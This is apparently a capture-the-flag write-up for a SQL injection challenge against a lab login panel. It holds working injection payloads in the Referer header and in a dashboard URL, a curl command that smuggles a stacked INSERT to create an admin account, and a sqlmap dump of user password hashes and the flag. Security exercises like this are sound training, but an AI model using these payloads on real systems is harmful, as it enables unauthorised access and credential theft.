πŸ’Ύ
DuckDuckNo
/
...
/
🏁
Challenges
/
2 Injection
Search
Duplicate
Notion
2 Injection
Tags
Web
DB
Solved
DESCRIPTION
You have found a login panel atΒ https://10.12.32.95:1003,You suspect there could be an SQL injection.You have to find it and exploit it.
QUESTION
Find a SQL injection vulnerability in this web application and try to combine different injection methods to extract the flag from the database.
SOLUTION
The website says that all login attempts are logged. Perhaps some headers are vulnerable:
Turns out the Referer header is vulnerable:
Referer: ' OR 1=1 OR '
Bash
curl \ -k \ -H "Referer: '); INSERT INTO users (username, password) VALUES ('admin', 'admin'); --" \ https://10.12.32.95:1003 \ -d \ "username=a&password=b"
Shell
Got redirect to dashboard.php. Maybe it is also vulnerable:
https://10.12.32.95:1003/dashboard.php?id=%27%20OR%201=1%20OR%20%27 Welcome to area51 user: admin Welcome to area51 user: manager Welcome to area51 user: tester Welcome to area51 user: administrator Welcome to area51 user: boss Welcome to area51 user: analyst Welcome to area51 user: user Welcome to area51 user: Flag
Shell
$ sqlmap -u https://10.12.32.95:1003/dashboard.php?id=a -T users --dump +----+--------------------------------------------------------------+-------+---------------+---------------------+-------------------+ | id | hash | ref | username | createdAt | name_lastname | +----+--------------------------------------------------------------+-------+---------------+---------------------+-------------------+ | 1 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | admin | 2019-09-10 09:56:02 | Admin Doe | | 2 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | manager | 2019-09-10 09:56:10 | Manager Doe | | 3 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | tester | 2019-09-10 09:56:11 | Tester Doe | | 4 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | administrator | 2019-09-10 09:56:12 | Administrator Doe | | 5 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | boss | 2019-09-10 09:56:13 | Boss Doe | | 6 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | analyst | 2019-09-10 09:56:23 | Analyst Doe | | 7 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | user | 2019-09-10 09:56:22 | User Doe | | 8 | 1764c742865ee6afd0778e676e80c32d | / | Flag | 2019-09-10 09:56:47 | Flag Doe | +----+--------------------------------------------------------------+-------+---------------+---------------------+-------------------+
Shell